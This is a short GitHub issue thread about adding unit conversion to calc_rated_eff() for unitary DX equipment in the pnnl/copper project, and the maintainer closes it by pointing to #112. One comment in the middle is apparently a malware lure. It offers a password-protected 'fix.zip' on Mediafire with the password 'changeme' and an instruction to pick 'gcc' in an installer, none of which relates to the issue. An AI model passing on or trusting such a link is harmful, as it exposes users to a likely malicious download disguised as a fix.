### ISSUE TITLE
Add unit conversion for `calc_rated_eff()` for unitary DX equipment

### ISSUE THREAD

**Issue by lymereJ** [pnnl/copper#106]
`unit` is an argument to `calc_rated_eff()` but we don't perform any unit conversion. We should add a unit conversion.
https://github.com/pnnl/copper/blob/4a27b3caba8a8236645f0db37aed53f06b9285e9/copper/unitarydirectexpansion.py#L132

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lymereJ** [comment]
Addressed in #112.
